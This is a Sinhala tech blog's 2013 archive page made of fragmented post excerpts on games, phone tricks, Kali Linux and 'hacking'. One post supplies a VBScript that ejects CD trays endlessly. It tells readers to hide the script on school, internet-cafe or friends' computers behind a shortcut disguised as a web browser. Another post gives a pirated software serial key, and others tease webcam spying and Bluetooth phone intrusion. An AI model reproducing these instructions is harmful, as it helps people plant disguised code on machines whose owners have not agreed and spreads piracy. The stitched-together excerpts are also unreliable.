Archive for 2013



හරි අම මුලින්ම කියන්න ඔනා මේක අපෙ බ්ලොග් ඩවියට එන සහෝදරයෙක්ගෙ ඉල්ලීමක් නිසා දාන පෝස්ට් එකක්, හරි දැන් ගේමට බහිමු

මුලින්ම ඔයා අපේ බ්ලොග් අඩවියට උදවුවක් විදිහට ඔයාගෙ දකුනුඅත පැත්තෙ තියෙනවා නිල්පාටින් තරු වගයක් වෝට් දාන්න ඒකට වෝට් එකක් දාන්න අපිට කරන උදවුවක් විදිහට, 
තව ඔයාලගෙ ගැටලු අපෙන් අහන්න පුලුවන් අපේ චැට් එක මගිනුත් , ඒක තියෙන්නෙ ඔයාගේ දකුනත පැත්තෙ බාර් එකේ යටින්ම  





ඔබේ පරිගණකයේ පරිගණක ක්‍රීඩා කරන විටදී දෝෂ එනවද? පරිගණකයේ VGA අඩු නිසා පරිගණක ක්‍රීඩාව හිරවෙනවද? එහනම් ඔන්න නියම විසදුමක් තියෙනව . අද මම කියන්න හදන්නේ ස්විෆ්ට් ශදෙර් ගැන . ස්විෆ්ට් ශදෙර් කියන්නේ මොඅකක්ද දන්නවද ? එකෙන් කරන්නේ මොකක්ද කියල මම දැන් කියල දෙන්නම්.
මුලින්ම ඔයා අපේ බ්ලොග් අඩවියට උදවුවක් විදිහට ඔයාගෙ දකුනුඅත ප්aත්තෙ තියෙනවා නිල්පාටින් තරු වගයක් වෝට් දාන්න ඒකට වෝට් එකක් දාන්න අපිට කරන උදවුවක් විදිහට  
තව ඔයාලගෙ ගැටලු අපෙන් අහන්න පුලුවන් අපේ චැට් එක මගිනුත් , ඒක තියෙන්නෙ ඔයාගේ දකුනත පැත්තෙ බාර් එකේ යටින්ම  
මෙම ලිපියෙන් අද මම කියන්න බලාපොරොත්තු වෙන්නේ කොහොමද අපි ඩයලොග් හෝ මොබිටෙල් දුරකතනයකට නොමිලයේ MMS යවන්නේ කියලා.


මුලින්ම ඔයා අපේ බ්ලොග් අඩවියට උදවුවක් විදිහට ඔයාගෙ දකුනුඅත පැත්තෙ තියෙනවා නිල්පාටින් තරු වගයක් වෝට් දාන්න ඒකට වෝට් එකක් දාන්න අපිට කරන උදවුවක් විදිහට  
තව ඔයාලගෙ ගැටලු අපෙන් අහන්න පුලුවන් අපේ චැට් එක මගිනුත් , ඒක තියෙන්නෙ ඔයාගේ දකුනත පැත්තෙ බාර් එකේ යටින්ම  

ඔන්න මම ඔයාලට පොඩි වැඩක් කියා දෙන්න යන්නේ ....පොඩිත් නැ ටිකක බරපතලි ..හැබැයි මේක අධ්‍යාපනය දැනගැනීම සදහා පමණි කියාදෙන්නේ හොදේ ....
මුලින්ම ඔයා අපේ බ්ලොග් අඩවියට උදවුවක් විදිහට ඔයාගෙ දකුනුඅත ප්aත්තෙ තියෙනවා නිල්පාටින් තරු වගයක් වෝට් දාන්න ඒකට වෝට් එකක් දාන්න අපිට කරන උදවුවක් විදිහට  

හරි දැන් වැඩේට බහිමු

ඔයාල දන්නවා ඇතිනේ . Auto-run Trojans අවගේම Bat file..ඒවා අපි හිතන්නේ Virus හැටියටනේ ...
එත් ඔයාල හදන ඒ Virus File ..අපේ Victims ලට යවන්න විදියක් නැනේ.....

ඔන්න මම ඒ ගැන කියා දෙනයි යන්නේ ......

මුලින්ම ඔයා අපේ බ්ලොග් අඩවියට උදවුවක් විදිහට ඔයාගෙ දකුනුඅත පැත්තෙ තියෙනවා නිල්පාටින් තරු වගයක් වෝට් දාන්න ඒකට වෝට් එකක් දාන්න අපිට කරන උදවුවක් විදිහට  
තව ඔයාලගෙ ගැටලු අපෙන් අහන්න පුලුවන් අපේ චැට් එක මගිනුත් , ඒක තියෙන්නෙ ඔයාගේ දකුනත පැත්තෙ බාර් එකේ යටින්ම 
මෙන්න තියනවා කස්ටියට පට්ටම ආතල් එකක් ගන්න පුළුවන් සිද්දියක් ! ඒ තමා වෙබ් කැම් එකක් Spying cam එකක් විදියට use කරන්න පුළුවන් විදියක් !

මේක කරන්නේ මෙහෙමයි 


පට්ට වැඩක් කරන්න පුලුවන් සොෆ්ට්වෙයර් කැල්ලක් ගෙනවා මෙන්න මෙකයි ඔන්න එහෙනම් මේ soft කෑල්ලෙන් පුලුවන් වැඩ අම්බානක තියනවා, මේකෙන් පුලුවන් Local Area එකේ තියන PC ඔක්කොම එකපාර හැන්ඩ්ල් කරන්න.. හැබැයි මේක වැඩිපුර ගැලපෙන්නේ School එකක වගේ PC ටිකක් තියන තැනකට ඒත් වැඩක් ගන්න පුලුවන්.. ඒ කියන්නේ මේවැඩ වලට බලන්නකෝ...


මුලින්ම ඔයා අපේ බ්ලොග් අඩවියට උදවුවක් විදිහට ඔයාගෙ දකුනුඅත පැත්තෙ තියෙනවා නිල්පාටින් තරු වගයක් වෝට් දාන්න ඒකට වෝට් එකක් දාන්න අපිට කරන උදවුවක් විදිහට  
තව ඔයාලගෙ ගැටලු අපෙන් අහන්න පුලුවන් අපේ චැට් එක මගිනුත් , ඒක තියෙන්නෙ ඔයාගේ දකුනත පැත්තෙ බාර් එකේ යටින්ම 
ඔන්න මම ක්‍රියාකාරකමක් අරන් එන්නේ නෑ.. නමුත් ඔයාලට වැදගත් කරුනු ටිකක් කියල දෙනවා.
…අද මම කියල දෙන්නේ Attack නැත්තන් පහරදීම් ගැන. 

මේව හැකින් නොවුනත් හැක් කිරීමේ මුල් අදියර වලදී හැක් කරන කෙනා විවිද Attack භාවිතා කරල Victim (ගොදුර) අඩපන කරනව.. ඊට පස්සේ හැකාට පුලුවන් වෙනවා එයාගේ ඉතුරු වැඩ ටික කරගන්න.. ඒව මොනාද කියල වැඩක් නෑ.. Attack ගැන දැනගමුකො එහෙනම්..


සුප්‍රකයට මයික්‍රොසො‍ෆ්ට් සමාගම විසින් නොකියා ජංගම දුරකථන ව්‍යාපාරය ඇමරිකන් ඩොලර් බිලියන 7.2ක මුදලකට මිලදී ගැනීමට එකගතාව පළ කොට ඇති බව පැවසේ.‍

සිරාම ආතල් එකක් ගන්න පුලුවන් මැක්සා වැඩක් තමයි මම අද ඔයාලට අරගෙන අවේ. හැක් කරන්න ඉතින් ගොඩක් කස්ටිය හරිම ආසයිනේ. ඉතින් මම දන්නව අපේ යාලුවොනම් ඉතින් මේවා කරන්නේ ජොලොයටනේ. හොදයි.  බ්ලූ ටූත් හරහා තවත් දුරකතනයක ට ඇතුලුවෙන්න පුලුවන්

 මොකද්ද මේ හැකින්, 

සරලව වෙනත් පධ්දතියකට හෝ ජාලයකට අනවසරයෙන් ඇතුලත් වීම හැකින් ලෙස හදුන්වයි.නමුත් සමහරු මෙය Cracking යනුවෙන් නම් කරයි ,ප්‍රධාන වශයෙන් WHITE HATS යනුවෙන් නම් කරන්නන් BLACK HAT වරු CRACKERS ල වශයෙන් හැදින්විය යුතු යයි තර්ක කරයි , 

කවුද මේ හැකර්වරු සරලව තේරුම් ගන්න මේ ලිපිය සකස් කරලා තියෙනවා.
WHITE HAT HACKERS





ඔන්න මම දැන් ගෙනාව පොඩි code වගයක්. ඔයාලට ඔයාලගෙ යලුවන්ව සිරාවටම බයකරන්න පුලුවන්. මේවා notepad වල type කරන්න. ඊට පස්සේ .vbs extensio යන නමින් සේව් කරල run  කරන්න.

           කිසියම් පරිගණකයක් Boot වීමේ දී යම්කිසි දෝෂයක් සහිත නම් පහත සඳහන් පණිවිඩ අතරින් එක් පණිවඩයක් ඔබේ තිරයේ දිස් වනු ඇත. එනම්,







                 මෙසේ සිදු වීමට හේතු කිහිපයක්ම බලපානු ඇත. ඔබේ පරිගණක තිරයේ ද මේ පණිවිඩ දිස්වේ නම් ඒ පහත සඳහන් හේතු නිසා විය හැකි ය.

 දැන් හැම තැනම හොර Copy වැහි වැහැලා. Samsung, HTC, Sony, LG සමහර ඒවා දැක්කම කොහොමවත්ම අදුනගන්න බෑ. දන්නේ නැතුවම විසිදාහක්, තිස්තාහක් වැඩිපුර දීලා copy එකක් අරගෙන. 

මේක දැනට ලංකාවේ අලුතෙන් Phone එකක් ගන්න ඉන්න හැමෝටම වැදගත් කාලීන ගැටළුවක්. මේකෙන් Phone වගේම Pad වලටත් check කරන්න පුළුවන්.

එහෙනම් පටන් ගනිමු..


ගොඩ කාලෙකින් මේ ඇත්තෙ එන්න බැරි උනා සමාවෙන්න ඔන ! මම දැනුත් ආවෙ වැඩ අස්සෙ ! මකුලු දැල් එහෙම ඹැදිලා එව කඩල යන්නත් එක්ක තමා මේ ආවෙ !

හරි මම අද කියල දෙන්න යන්නේ කොහොමද සරල කුඩා සර්වරයක් හදා ගන්න යන්නෙ කියල අපි මෙකට භාවිතා කරන්නේ ඔපන් සොර්ස් (Open source) මෙහෙයුම් පධ්‍යතියක් මම ඒක ‍තෝරා ගන්න හේතුව නම් නොමීලේ බාගන්න පුලුවන් ඒකයි.ඉතින් මෙන්න මෙහෙමයි පටන් ගන්නේ (මම වෙන දවසක කියල දෙන්නම් හොද පට්ට සර්වරයක් හදන විදිහ ගැන)





files හංගන්න ගොඩක් ක්‍රම තියනවානෙ  සාමාන්‍යන් ඔයාල දන්නවා ගොඩක් අය දන්න ප්‍රසිද්දම ක්‍රමය තමා hidden කරන එක. ඒත් ඒකෙ තියන ප්‍රසිද්ද කම නිසාම ඒක එතරම්ම සාර්තක නෑ කියන එක දන්නවනෙ. ඒ වගෙම files හංගන්න හදපු software එහෙමත් තියනවනෙ ඒ ගැනත් දන්නවා ඇතිනෙ. ඒ වගේ ඒවනම් ඉතින් ගොඩක් තැන් වලින් හොයාගන්න පුලුවන්නෙ. ඒත් මම කියල දෙන්න යන්නේ එතරම්ම ප්‍රසිද්ද නැති නමුත් සාර්තක තවත් ක්‍රමයක් ඉතින් ඔයාලත් මේක කරල බලනකො. ඔන්න යටින් පියවර වශයෙන්ම කියල තියනව.




 ගොඩක් දෙනෙකුට තියන ප්‍රශ්නයක් තමා phone එකට සිංහල දාගන්න එක. ගොඩක් තැන් වල කියල දීල තියනවා phone එක root කරලා සිංහල දාගන්න විදිය ඒත් ඒක හැමෝටම කරන්න විදියක් නෑ. root කිරීමෙන් දුරකතනයේ වගකීම නැති වෙන නිසා ගොඩක් දෙනෙකුට ඒක කරන්න බෑ, තවත් කෙනෙකුට root කරගන්න එක ටිකක් අමාරු වැඩක්.
ඉතින් මම අද කියල දෙන්න යන්නෙ phone එකේ වගකීම නැති කරගන්නෙත් නැතුව කිසිම අවදානමක් ගන්නෙත් නැතුව ඔයාගෙ phone එකට සිංහල දාගන්න විදියක් ගැනයි.


මම හරින්ද්‍ර රාජපක්ශ  මේ මාගේ පලමු පෝස්ට්  එකයි වැරදි ඇති ඒවාට සමා වෙන්න!!
3G,4G සිග්නල් ! මා සිතන ආකාරයට මේවා ඔබේ දෙසවනට හොඳින් හුරු පුරුදු ඇති! හැබැයි ඉතින් R.B.M.R ග්රෑප් එකේ ඉන්න කට්ටිය දන්නවා මේවා මේ කියන තරම් ස්පීඩ් නෑ කියලා !
 4G නම් ඉතින් කොටින්ම නෑනේ !
 ඒ වාගේම තමා ඔය සන්නිවේදන සමාගම් කියන තරම් ලංකාව 3G සිග්නල් වලින් ආවරනය කරලත්නෑ !!!!! 
 සිග්වල් 0යි ලොල් නේද? ඔය ප්‍රශ්නයට විසඳුමක් හොයාගෙන යද්දී තමා මට මේ අලුත් විදියේ ගැජමැටික් ක්‍රමයක් සෙට් වුනේ ! 
හරි ඉතින් මම දැන් කියලා දෙන්න යන්නේ 3G සිග්නල් අඩුනම් වැඩි කරගන්න විදියක් ගැනයි. මුලින්ම ඔයාලට පහත දාලා තියෙන බඩු ටික උවමනා වෙනවා.

යුද්ධය ජීවිත හා දේපළ විනාශ කර දමන අමිහිරිතම අත් දැකීමකි. නමුත් ඒ අමිහිරිත මතකයන් අතුරින් යුද්ධයේ අතුරු නිමැයුමක් ලෙස ලොවට දායාද වු අනර්ග නිපැයුම් නැතුවාද නොවේ. ඔබ මා දන්නා සත්‍යයක් නම් වර්ථමානයේ වුවද භාවිතා වන ෆොක්ස්සොගන් රථය අමිහිරි යුද්ධයේ අතුරු නිපැයුමක් ලෙස ඉතිරි වූ නිමැයුමකි.


1960  ලොවම යුද්ධයේ භීතියෙන් ඇලලී ගිය සමයක් විය.ලෝකයේ පොලිස්කාරයාවන ඇමරිකාව අද අල්කයිඩාවට බිය වූවා සේම එදාත් බියවී සිට ඇත. මක් නිසාද යත් යම් ලෙසකින් පරමාණු බොම්බයක් හෝ වෙනත් අකාරයක යුධමය කට යුත්තක අතුරු ප්‍රතිඵලයක් ලෙස ඇමෙරිකාව රැස් කරගත් දැනුම හා තොරතුරු විනාශ වුවහොත් ඒ සියල්ල නැවත ලබා ගැනීමට ක්‍රමයක් නොමැති වීමයි. මේ සඳහා පරීක්ෂණ හා අධ්‍යයන කිරීමට ඇමෙරිකානු රාජ්‍ය ආරක්ශක අමාත්‍යංශය පියවර ගනු ලැබුණි.

අවසානයේ මෙහි ප්‍රතිපලයක් වූයේ ARPANET හෙවත් Advanced Research Projects Agency Network
 යන්න බිහි වීමයි. මෙමඟින් ඇමෙරිකාවේ අධ්‍යාපන සොයාගැනීම් හා විද්‍යාත්මක තොරතුරු පරිගණක ජාලයක් හා සම්බන්ධ විය.

1985 National Science Foundation විසින් අර්පානෙට් පදනම් කර ගනිමින් NSFNET නමින් ජාලයක් නිර්මාණය කළ අතර මෙහි සේවය නොමිලේ ඇමෙරිකාණු අධ්‍යාපන ආයතන වලට පිරි නැමුණි. ඒ හා සමඟම ප්‍රාදේශීය වශයෙන් පරිගණක ජාල ඒකාබද්ධ කිරීමක්ද සිදුවිය.

NSFNET වසර 5 කට පසු එනම් 1990 දී පමණ ටීම් බර්නස් ලී නම් තරුණ විද්‍යාඥයා ලෝකයේ ඇති සියළු පරිගණක එක් ජාලයකින් සමන් විය යුතු යැයි සිතූ සිතුවිල්ල සැබෑවිය. ඒ අනුව යමින් www හෙවත් World Wide Web යන අපූර්ව සිතුවිල්ල ලෝකයට දායාද විය.

වර්තමානයේ මෙම අන්තර්ජාලයේ පාලකයා ලෙස කටයුතු කරනුයේ World Wide Web Consortium ආයතනයයි. ලාභ නොලබන ආයතනයක් ලෙස ක්‍රියාත්මක වන මෙහි නඩත්තුව AT&T, Sun Micro system, Oracle Inc, Adobe System Inc, Microsoft Corporation ආදී වු ලොව ප්‍රධාන පෙලේ මෘදුකාංග ආයතන විසින් දරනු ලබයි.

 
ඉතින් අද කියන්න හදන්නෙ සුවිශේෂී ලිනක්ස් මෙහෙයුම් පද්ධතියක් පිළිබඳවයි. මෙය කාලි ලිනක්ස් නමින් දැන් හැඳින්වුවද මිට පෙර Blacktrack Linux ලෙස වඩාත් ප්‍රචලිත වුණා. Hack කිරීමට අවශ්‍ය tools රාශියක් අඩංගුකර ඇති මෙම මෙහෙයුම් පද්ධතිය Blacktrack හි 6 වන සංස්කරණය ලෙස දැක්විය හැක.
එහි පෙර සංස්කරණවල තිබූ tools සියල්ලම සමඟ නව tools කීපයක්ද එකතු කර ඇති අතර එහි නිපැයුම්කරුවන් පවසන අන්දමට මේ වන විට tools 300කට වැඩි ප්‍රමාණයක් අන්තර්ගත වේ. මීට අමතරව පෙර සංස්කරණ වලට වඩා ස්ථායි (stable) සංස්කරණයක් ලෙසද මෙය දැන්විය හැක.
Kali Linux මඟින් සිදුකල හැකි කාර්යයන් රාහියක් ඇති අතර මෙමඟින් හැකර් වරුන්ගේ කාර්යභාරය වඩාත් පහසු කර ඇත. අන්තර්ජාලය තුල මේ සම්බන්ධව ලියැවුණ ලිපි රාශියක් ඇති අතර www.kali.org වෙත පිවිස මෙය බාගත කල හැක. තවද එහි blog අඩවිය සහ පෝරමය මඟින් මේ පිළිබඳ වැඩිදුර තොරතුරු ලබා ගත හැක.
http://adf.ly/Ymd6a

{ එන වින්ඩොව් එක SKIP කරන්න }

පෝස්ටුව හොදනම් ලොමෙන්ටුවක් කොටලා යන්න අමතක කරන්න එපා


…ඔන්න කස්ටිය කැමති ඇතිනෙ තමන්ගෙ Desktop එක සිරාවට තියාගන්න , හරි අන්න ඒ වැඩේට හරියන නියම අයිටම් එකක් තමා මම ගෙනාවෙ බලන්නකො කොහොමද කියලා

හරි වැඩේට එන්ටර් වෙන්න කලින් ඔයා මුලින්ම ඔය යටි තියෙන පොඩි සොෆ්ට් එක බා ගන්නකෝ

http://adf.ly/YdiUT

හරි දැන් බලන්නකො ඔය බා ගත්තු එක install කරලා ,

install කරාම පහල තියෙනව වගෙ ඩෙස්ක්ටොප් එක පෙනෙයි ,


තව එක එක වැඩකෑලි තියෙනව එවා ඉතින් මම කියලා දීලා වැඩක් නැ එක නිසා ඔයාල පොඩ්ඩක් හොයලා බලන්න , මෙ ඔයාලට හම්බවුනු ගෙදර වගෙ ඩෙස්ක්ටොප් එකේ පට්ට පට පට ගේම්ස් දෙක තුනක්ම තියෙනව එව ඔයාලට කියල දුන්නොත් අගේ නෑ නෙ එක නිසා ඔයාලම හොයාගන්න ! හොයාගන්න අමාරු නැ !

…පෝස්ට් එක හොදනම් කොමෙන්ටුවක් කොටල යන්න යාලුවනේ

Android Phones කියන්නේ අද අපිට සුලබව හැම කෙනෙක් අතම වාගේ දකින්න පුළුවන් දෙයක්. විවිද අවශ්‍යතාවයන් සදහා පුද්ගලයින් Android Phones බාවිතා කරනවා. සමහරු විනෝදාත්මක දේ සදහා Android Phones බාවිතා කරන විට, තවත් සමහරු කාර්යාලීය අවස්‍යතාවයන් සදහා එය බාවිතා කරනවා. ඉතින් එවැනි තවත් විවිද වූ අවස්‍යතාවයන් සදහා පුද්ගලයින් Android Phones බාවිතා කරනවා.
ඔබ දැන සිටියාද ඔබේ Android Phone එක, ඔබේ පරිගණකයේ mouse එක ලෙස බාවිතා කරන්න පුළුවන් බව? ඔබට පුළුවන් WiFi Mouse Application බාවිතයෙන් ලේසියෙන්ම ඔබේ Android Phone එක mouse එකක් ලෙසින් බාවිතා කරන්න. මෙම app එක හැම Android device එකකම වාගේ වැඩකරනවා.




 


තම පරිගණකය හැකර්වරුන්ගෙන් සහ වයිරස් වැඩසටහන් වලින් ආරක්ෂා කර ගැනීම සදහා ඔබ කවුරුත් වාගේ විවිද ක්‍රියාමාර්ග අනුගමනය කරනවා.

 නමුත් ඔබ බොහෝ දෙනෙක් තමන්ගේ ස්මර්ට්ෆෝනයේ ආරක්ෂාව පිළිබද වැඩි අවදානයක් යොමු කරන්නේ නැහැ. සමහර විට එය එසේ සිදුවනු ඇත්තේ ස්මාර්ට්ෆෝනය යනු ඔබේ ලිපිගොනු, පින්තූර, වීඩියෝ හා අනෙකුත් දෑ ගබඩාකර තබන පාරම්පරික දෘඩාංගයක් නොවන නිසා වෙන්නට ඇති. නමුත් අද වන විට ස්මාර්ට්ෆොන්ස් බාවිතා කර බොහෝ දෙනෙක් තමන්ගේ පුද්ගලික තොරතුරු මෙන්ම තමන්ගේ ව්‍යාපාරික තොරතුරු පවා තමන්ගේ ස්මාර්ට්ෆොනයේ ගබඩා කර තබාගන්නවා. ඉතින් එවැනි තොරතුරු වෙනත් අයෙකුගේ අතට පත්වුවහොතින් ඔබට පුද්ගලිකව මෙන්ම ව්‍යාපාරික වශයෙන්ද පාඩු ලැබීමට අවදානමක් තිබෙනවා.


ඔබ ඔබේ පරිගණකයේ ආරක්ෂාව ගැන සිතනවා මෙන්ම තමන්ගේ ස්මාර්ට්ෆොනයේ ආරක්ෂාව ගැනත් සිතා ඒ සදහා අවශ්‍ය ක්‍රියාමාර්ග ගන්නවානම් ඔබට පුළුවන් ඔබේ ස්මර්ට්ෆෝනය ආරක්ෂාකරගන්න. මේ ලිපියෙන් මම කතා කරන්න බලාපොරොත්තු වෙන්නේ ඔබේ ස්මර්ට්ෆෝනයේ ආරක්ෂාව වෙනුවෙන් ඔබට ගතහැකි ක්‍රියාමාර්ග කිහිපයක් පිලිබදවයි. ඉතින් මෙම කරනු වලට අමතර ස්මාර්ට්ෆොනයේ ආරක්ෂාවට ගත හැකි ක්‍රියාමාර්ග සම්බන්දව අදහස් ඔබ සතු වේනම්, ඔබට පුළුවන් comment එකක් ලෙසින් ඔබේ අදහස් අනෙක් පාඨකයින් සමගින් බෙදාගැනීමට.
smartphone security ඔබේ ස්මාර්ට්ෆෝනයේ ආරක්ෂාවට ගත හැකි ක්‍රියාමාර්ග කිහිපයක්

 


Xp වලින් 7 වලට ගියාම 7 වලට පට්ට විදියට බැන්නා. ඒත් දැන් හැමෝම Use කරන්නේ 7.

7 වලින් 8 වලට මාරු වුනාමත් එහෙමයි. ඒත් ගොඩක් අයට 8 වලට අත තිබ්බම කරකවලා අතෑරියා වගේ. Start button එකවත් හොයාගන්න බෑ.






මේකෙන් අපිට Computer එකේ මොනවත් අල්ලන්නේ නැතුව දුර ඉදලා ඕනෑම Video එකක්, Audio එකක් Play වෙනකොට Pause/Play  , Next  ,Previous කරන්න පුළුවන්.

ඒ කියන්නේ මෙහෙම වැඩක්,

අපි Normal Video එකක් බලනකොට Keyboard එකෙන් හරි mouse එකෙන්හරි වෙනදා කරන දේවල් දැන් කොම් එකට දුර ඉදලා කරන්න පුළුවන්. අඩි 1-6 අතර දුරක සිට

,අට මේ අයිටම් කෑල්ල දුන්නෙ මගෙ යාලුවෙක් එයාට ස්තූති කරන ගමන් අපි වැඩේට එන්ටර් වෙමු

මේක කරන්න ඔයාට තියෙන්න අවශ්‍ය Web Cam  එකක් විතරයි.

මුලින්ම මේ පොඩි Software කෑල්ල Download කරගෙන Install කරගන්න. (3.7MB)
work with Windows and Mac OS

මේ ගැන දැනගෙන ගොඩක් කල් හැබැයි ඉතිං ලියන්න තමයි වෙලාවත් නැතිවු‍ණේ.
Mastercard-LCD-Screen

කොහොම වුණත් එදිනෙදා ජීවිතයේ දකින්න ලැබෙන දෙයක් ගැනයි මේ. හැමෝම දන්නවනෙ  Master Card, Visa Card ගැන. ගොඩක් වෙලාවට අපි පාවිච් කරන Credit card, debit card ගත්තහම මේ වර්ග දෙකෙන් එකකට අයිති.


මෙන්න cord ටික

උදාහරනයක් ලෙස ඔයට type කරන්න ඔනෙ RBMR කියල

 මේවිදියට type කරන්න........





හැබැයි මෙහෙම ටයිප් කොරන්න පුලුවන් Chat Box එකේ හරිය






RBMR =  [[106699962703083]] [[116067591741123]] [[106596672714242]] [[106699962703083]]


ඔය දාල තියෙන එක කොපි කොරන්න බැ එක නිසා පහලින් තියෙන ඩවුන්ලොඩ් බටන් එක ඔබලා ඩවුන්ලෝඩ් කරගන්න !


[[107015582669715]] = A

[[116067591741123]] = B

[[115602405121532]] = C

[[112542438763744]] = D

[[115430438474268]] = E

[[109225112442557]] = F

[[111532845537326]] = G

[[111356865552629]] = H

[[109294689102123]] = I

[[126362660720793]] = J

[[116651741681944]] = K

[[115807951764667]] = L

[[106596672714242]] = M

[[108634132504932]] = N

[[116564658357124]] = O

[[111669128857397]] = P

[[107061805996548]] = Q

[[106699962703083]] = R

[[115927268419031]] = S

[[112669162092780]] = T

[[108983579135532]] = U

[[107023745999320]] = V

[[106678406038354]] = W

[[116740548336581]] = X

[[112416755444217]] = Y

[[165724910215]]        = Z



 




http://adf.ly/YUeTl
[එන වින්ඩොව් එක තත්පර 5ක් ඉදලා SKIP කරන්න ]



 මොනා හරි දෙයක් උනොත් මම වග කියන්නෙ නැ කියන එකත් මතක තියා ගෙන වඩෙට බහිමු ඒ කුවෙ ඔය මේ Virus හදලා මේක අනවශ්‍ය විදිහට භාවිතා කරල මොකක් හරි ප්‍රශ්නයක් ඇති උනොත් ඕන් මමනම් නැ ........

 අම මුලින් කුවා වගෙ මේ දේ දැනගැනීම පිනිසක් භාවිතා කරනවනම් හැමෝටම හොදයි .....

 

මම කලින් කියලා දුන්න හදමු 1 කොටසින් කියල දුන්න එකෙන් ඔයාල කාටවත් හානියක් වෙන විදිහට වැඩ කරා කියලා මම හිතන්නෙ නැ එක නිසා මේ දේත් ඔයා ඔයාගෙ දැනුම වැඩිකරගැනීමට පමනක් පරිහරනය කරානම් කාගෙත් ඇගට ගුනයි  

කලින් පාඩම

1.මුලින්ම ඔයා NOTE PAD එක OPEN කරගන්න

2.දැන් ඔයා මම මෙ දාල තියෙන එක TYPE කරන්න , ඔයාට මෙ මම දාල තියෙන TYPE කරන්නම වෙනව මොකඩ මෙ මම දාල තියෙන එක COPY PASTE කරන්න බැ....

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


දැන් anything.vbs කියල save කරන්න.


මෙකෙන් පරිගනකයට හානියක් වෙන්නෙනම් නැ එකනිසා මෙකෙන් ඔයාලගෙ යාලුවන්ව බයකරන්න පුලුවන්


මෙක කරාම අඉන් කරන්නෙ කොහොමද කියල කස්ටිය අහයිනෙ එක අයින් කරන්නෙ මෙහෙමයි


  • Ctrl + Alt + Delete ඔබල Task Manager ඕපන් කරගන්න.

  • Process යටතේ wscriptයන්න තොරා End Process කරන්න        

වැඩේ එච්චරයි. වැඩිපුර ෆන් එකක් ගන්න ඕනේ නම් පහත පියවර අනුගමනය කරන්න. 

(ඔබ කරන ගොන් වැඩවලට මම වගකියන්නේ නෑ...:පී)


  • යන්න Internet Cafe එකකට , පාසලේ කොම්පියුටර් ලැබ් එකට, හෝ යාලුවාගේ පරිගණකය ගාවට..

  • මේ Script  එක ඒ පරිගණ්කයේ කොහේහරි හංගන්න. (Local Disk, My Music or anywhere. But not Desktop)
  • කොපි කරපු ෆයිල් එක Right Click කර Send To >>> Desktop කරන්න. 
  • එකේ ඇති Shortcut එක Rename කරන්න (Games Folder Mozilla Firefox, Internet Explorer, Chrome,  වගේ නමකට )
  • අදාළ නමට Right Click>>> Properties>> Custom>>>Change Icon ගිහින් Icon එක මාරු කරන්න.









ඉතින් කොහොමද යාලුවනේ මෙ දවස් වල කස්ටිය දවල් වෙනකන් නිදාගන්නව ඇති නේද වැස්සත් එක්කනෙ....

ඔන්න අද මම මේ post එකෙන් කියන්න හදන්නේ ඔයලා ගොඩක් අය පුදුම කරවන
software එකක් ගැනයි. 

මේ software එක ගැන කලින් අහල තියෙන අයට නම් ඉතින්
මේක පුදුම දෙයක් වෙන්නේ නෑ.මම මේක කියන්න යන්නේ නොදන්න අයට...ඈ

මේ software එක නමින් කියනවා නම් Luxand blink කියලා එකක්.මේකෙන්
පුලුවන් අපට අපේ පරිගණකයට log වෙන්න කිසිම Password එකක් ගහන්නේ
නැතිව අපේ මූණ පෙන්වලා....

හැබැයි මේ දේ කරන්න නම් අපේ පරිගණකයට Web Camera එකක් තිබ්ය යුතුමයි..
ඉතින් දැන් කාලේ ඉන්න අපි හැමෝටම පාහේ Laptop පරිගණක තියෙන එකේ
ඉතින් බය වෙන්න දෙයක් නෑ.
Desktop පරිගණක භාවිතා කරන අයට නම් ඉතින්
Web Camara එකක් use කරන්න වෙනවා...

කතා ඇති දැන් වැඩෙට බහිමුකො...

මේ software එක පරිගණකයට install කරද්දිම මේ software එකෙන් අපේ මූණ Video කරගන්නවා...

එමගින් කරන්නේ අපේ මූණේ ඇස්,නහය වගේ ස්ථිර දේවල් වල පිහිටීම හොදට මතක තියා ගන්න එකයි..
මේකෙදි මුලු මූණම මතක තියා ගන්නේ නෑ, මොකද කියනවා නම් පිරිමි අය සාමානයෙන් රැවුල වවන හින්දා රැවුල ඇති වෙලාවක මේ software එක install කරලා බැරිවෙලාවත් රැවුල කැපුවත් එහෙම,පරිගණකයට එයාව අදුරගන්න බැරි වෙනවනේ.
ඒ බව දැන ගෙන තමයි මෙයාලා මේ software එක හදලා තියෙන්නේ ඒ කියන්නේ රැවුල, කොන්ඩේ එහෙම මේකෙන් මතක තියාගන්නෙ නෑ...

  මේ පින්තූරේ දැක්කම ඔයාලට තේරේවි..



හරි මේක install කරගෙන ඉවර වුනාම ඔයාලට කරන්න තියෙන්නේ Computer එකේ Password එක ගහන්නේ නැතිව මූණ පෙන්වලා log වෙන්න විතරයි... කොහොමද වැඩෙ..

බැරි වෙලාවත් එහෙම මූන පෙන්වද්දි අදුරගන්න බැරි උනොත් බය වෙන්න දෙයක් නෑ වෙනදා විදියටම Password එක ගහලා log වෙන්න පුලුවන්....


ම්ම්ම්ම්ම් එහෙනම් ඔයාල පහලින් Download කරගන්නකෝ...


                                       (එන වින්ඩො එකෙන් SKIP AD කිලික් කරන්න)


KEY එකක් ඉල්ලුවොත් මෙන්න KEY එක..    Name : owner1
                                  Serial: 41F0-747A-1351
        (මෙක වැඩ කලෙ නැත්තම් කියන්න මම වෙන Key එකක් දෙන්නම්)

ඔන්න එහෙනම් වැඩෙ හරි දාල බලල කියන්න කො වැඩේ කොහොමද කියල ඈ..





සමහර මෘදුකාංග භාවිතා කරද්දි මෙන්ම විවිධ හේතු නිසා අපට අපේ මොනිටරය ඉඩ මදි වෙන අවස්ථා තියනවා. 

ඒ අවස්ථා වලදි අපේ ඩිස්ප්ලේ එක වෙන මොනිරටයකට එක්ස්ටෙන්ඩ් කරන්න පුළුවන්.
නමුත් අපි ළඟ මොනිටර් දෙකක් නැත්නම් ?
 අන්න ඒ අවස්ථා වලදි ඔබේ ඇන්ඩ්‍රොයිඩ් හෝ ඇපල් දුරකථනය භාවිතා කරන්න පුළුවන්.
Android-iDisplay
මේ ඇප් එක iDisplay කියල හඳුන් වනවා.
ඔබ මුලින්ම එහි ඩෙස්ක්ටොප් මෘදුකාංගය බාගත යුතුයි. 
